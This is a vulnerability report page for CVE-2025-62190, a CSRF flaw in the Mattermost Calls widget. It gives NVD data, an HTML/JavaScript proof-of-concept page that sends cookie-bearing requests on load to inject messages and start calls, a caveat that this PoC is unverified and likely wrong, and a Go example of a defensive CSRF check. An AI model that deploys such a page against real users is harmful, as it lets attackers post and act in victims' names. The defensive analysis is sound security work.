Security Vulnerability Report
CVE-2025-62190 CVSS 4.3 MEDIUM

CVE-2025-62190

Published: 2025-12-17 13:15:58
Last Modified: 2025-12-29 18:51:52

Description

Mattermost versions 11.0.x <= 11.0.4, 10.12.x <= 10.12.2, 10.11.x <= 10.11.6 and Mattermost Calls versions <=1.10.0 fail to implement CSRF protection on the Calls widget page which allows an authenticated attacker to initiate calls and inject messages into channels or direct messages via a malicious webpage or crafted link

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* (>= 10.11.0, < 10.11.7) - VULNERABLE
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* (>= 10.12.0, < 10.12.3) - VULNERABLE
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* (>= 11.0.0, < 11.0.5) - VULNERABLE
Mattermost 11.0.x <= 11.0.4 (first unaffected per the CPE range: 11.0.5)
Mattermost 10.12.x <= 10.12.2 (first unaffected per the CPE range: 10.12.3)
Mattermost 10.11.x <= 10.11.6 (first unaffected per the CPE range: 10.11.7)
Mattermost Calls <= 1.10.0 (no CPE match entry in the NVD data on this page; the fixed Calls version is not stated here)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CSRF PoC for CVE-2025-62190 -->
<!DOCTYPE html>
<html>
<head>
  <title>Mattermost CSRF Attack PoC</title>
</head>
<body>
  <h1>Mattermost Calls CSRF PoC - CVE-2025-62190</h1>
  <p>This PoC demonstrates the CSRF vulnerability in Mattermost Calls widget.</p>
  <script>
    // Configuration - Replace with actual values
    const MATTERMOST_URL = 'https://your-mattermost-instance.com';
    const TARGET_CHANNEL_ID = 'target-channel-id';
    const MALICIOUS_MESSAGE = 'This is an injected malicious message';

    // Attack 1: Inject message into channel
    async function injectMessage() {
      const messagePayload = {
        channel_id: TARGET_CHANNEL_ID,
        message: MALICIOUS_MESSAGE,
        root_id: '',
        file_ids: []
      };
      // This request will be automatically sent with user's cookies
      // No CSRF token validation in vulnerable versions
      fetch(`${MATTERMOST_URL}/api/v4/posts`, {
        method: 'POST',
        credentials: 'include',
        headers: {
          'Content-Type': 'application/json',
        },
        body: JSON.stringify(messagePayload)
      });
    }

    // Attack 2: Initiate unauthorized call
    async function initiateCall() {
      const callPayload = {
        channel_id: TARGET_CHANNEL_ID,
        // Additional call parameters
      };
      fetch(`${MATTERMOST_URL}/api/v4/calls/start`, {
        method: 'POST',
        credentials: 'include',
        headers: {
          'Content-Type': 'application/json',
        },
        body: JSON.stringify(callPayload)
      });
    }

    // Auto-execute on page load
    window.onload = function() {
      console.log('CSRF PoC executing...');
      injectMessage();
      initiateCall();
    };
  </script>
  <p>If you see this text, the attack has been executed.</p>
</body>
</html>

A caveat before relying on this PoC: it never loads the Calls widget page that the description identifies as the unprotected surface. It instead fires cross-origin fetch() calls with a JSON content type at the core REST API. That is not a "simple" request, so the browser sends a CORS preflight first and withholds the POST unless the server's CORS policy approves it, and Mattermost's core API applies its own CSRF check to session-cookie requests independently of the Calls widget. The path /api/v4/calls/start is also not a core API route; Calls ships as a plugin with its own endpoints. Read the block as the general shape of a CSRF page (victim's browser, attacker-controlled origin, cookies attached automatically), not as a verified reproduction of CVE-2025-62190.
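The description says the widget page lacked CSRF protection; the following is an added example, written for this page and not taken from Mattermost or the Calls plugin, of the gate such a cookie-authenticated, state-changing endpoint needs. It is in Go because the Mattermost server and the Calls plugin are Go code. The site origin, session token, header and cookie names, route and the sample requests are all constructed for the illustration. It layers three independent checks (browser-set Sec-Fetch-Site, Origin/Referer against the site's own origin, and a session-bound token in a custom header), then runs a request shaped like the PoC above and a request shaped like the widget's own through that gate.

```go
// Added example, not Mattermost or Calls plugin code: the CSRF gate a
// cookie-authenticated, state-changing endpoint needs. Site origin, token,
// header and cookie names, route and sample requests are all constructed.
package main

import (
	"crypto/subtle"
	"fmt"
	"net/http"
	"net/http/httptest"
	"net/url"
	"strings"
)

// Constructed stand-ins for a deployment's own values.
const (
	SiteOrigin   = "https://chat.example.com"
	SessionToken = "0123456789abcdef0123456789abcdef" // minted per session in real code
)

// Verdict records whether a request passed and, if not, which check refused it.
type Verdict struct {
	Allowed bool
	Reason  string
}

// CheckCSRF applies three independent checks to a state-changing request;
// any one failing refuses it.
func CheckCSRF(r *http.Request, siteOrigin, sessionToken string) Verdict {
	// Safe methods skip the gate only because they are assumed side-effect
	// free; a page that starts a call from GET parameters breaks that assumption.
	switch r.Method {
	case http.MethodGet, http.MethodHead, http.MethodOptions:
		return Verdict{true, "safe method"}
	}
	// 1. Fetch metadata: browsers send "cross-site" for requests a foreign page
	//    initiates, cookies or not. An absent header falls through to check 2.
	if sfs := r.Header.Get("Sec-Fetch-Site"); sfs != "" && sfs != "same-origin" && sfs != "none" {
		return Verdict{false, "Sec-Fetch-Site is " + sfs}
	}
	// 2. Origin, else Referer, must be the site itself; neither present is
	//    refused, since such a client cannot be told apart from an attacker.
	src := r.Header.Get("Origin")
	if src == "" {
		if u, err := url.Parse(r.Header.Get("Referer")); err == nil && u.Host != "" {
			src = u.Scheme + "://" + u.Host
		}
	}
	if !strings.EqualFold(src, siteOrigin) {
		return Verdict{false, fmt.Sprintf("origin %q is not the site", src)}
	}
	// 3. Session-bound token in a custom header: a foreign page can neither read
	//    it nor set the header without a CORS preflight. Constant-time compare.
	if subtle.ConstantTimeCompare([]byte(r.Header.Get("X-CSRF-Token")), []byte(sessionToken)) != 1 {
		return Verdict{false, "missing or wrong CSRF token"}
	}
	return Verdict{true, "ok"}
}

// build makes a constructed cookie-authenticated POST; "" omits that header.
func build(origin, fetchSite, token string) *http.Request {
	r := httptest.NewRequest(http.MethodPost, "/api/v4/posts", strings.NewReader(`{"channel_id":"c1","message":"x"}`))
	r.Header.Set("Content-Type", "application/json")
	r.AddCookie(&http.Cookie{Name: "session", Value: "victim-session"})
	for k, v := range map[string]string{"Origin": origin, "Sec-Fetch-Site": fetchSite, "X-CSRF-Token": token} {
		if v != "" {
			r.Header.Set(k, v)
		}
	}
	return r
}

// CrossSiteRequest is what a foreign PoC page makes the victim's browser send:
// cookie attached, foreign Origin, browser-set Sec-Fetch-Site, no token.
func CrossSiteRequest() *http.Request { return build("https://attacker.example", "cross-site", "") }

// SameSiteRequest is what the site's own widget sends, token included.
func SameSiteRequest(token string) *http.Request { return build(SiteOrigin, "same-origin", token) }

// Serve runs a request through a handler guarded by CheckCSRF: 403 or 201.
func Serve(r *http.Request) int {
	rec := httptest.NewRecorder()
	if v := CheckCSRF(r, SiteOrigin, SessionToken); !v.Allowed {
		http.Error(rec, "forbidden: "+v.Reason, http.StatusForbidden)
	} else {
		rec.WriteHeader(http.StatusCreated) // the real handler would act here
	}
	return rec.Code
}

func main() {
	fmt.Println("cross-site PoC:        ", Serve(CrossSiteRequest()))
	fmt.Println("same-site, valid token:", Serve(SameSiteRequest(SessionToken)))
	fmt.Println("same-site, stale token:", Serve(SameSiteRequest("stale")))
}
```

The safe-method exemption is the trap the "crafted link" wording in the description points at: if a widget page performs an action (starting a call, posting a message) from GET query parameters, a plain link reaches it with the victim's cookies and none of the three checks ever run. The action has to move behind a POST that carries the token, or the page has to apply the gate regardless of method.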

References

https://mattermost.com/security-updates (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62190", "sourceIdentifier": "[email protected]", "published": "2025-12-17T13:15:58.370", "lastModified": "2025-12-29T18:51:51.667", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mattermost versions 11.0.x <= 11.0.4, 10.12.x <= 10.12.2, 10.11.x <= 10.11.6 and Mattermost Calls versions <=1.10.0 fail to implement CSRF protection on the Calls widget page which allows an authenticated attacker to initiate calls and inject messages into channels or direct messages via a malicious webpage or crafted link"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.11.0", "versionEndExcluding": "10.11.7", "matchCriteriaId": "EB4AD9AE-B2DB-4D49-87AD-FA5F9CE6A0C8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.12.0", "versionEndExcluding": "10.12.3", "matchCriteriaId": "DD0ED714-56F9-4C84-B84D-3BF658940568"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0", "versionEndExcluding": "11.0.5", "matchCriteriaId": "6130B691-5017-418D-A28A-84A83AA2496C"}]}]}], "references": [{"url": "https://mattermost.com/security-updates", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}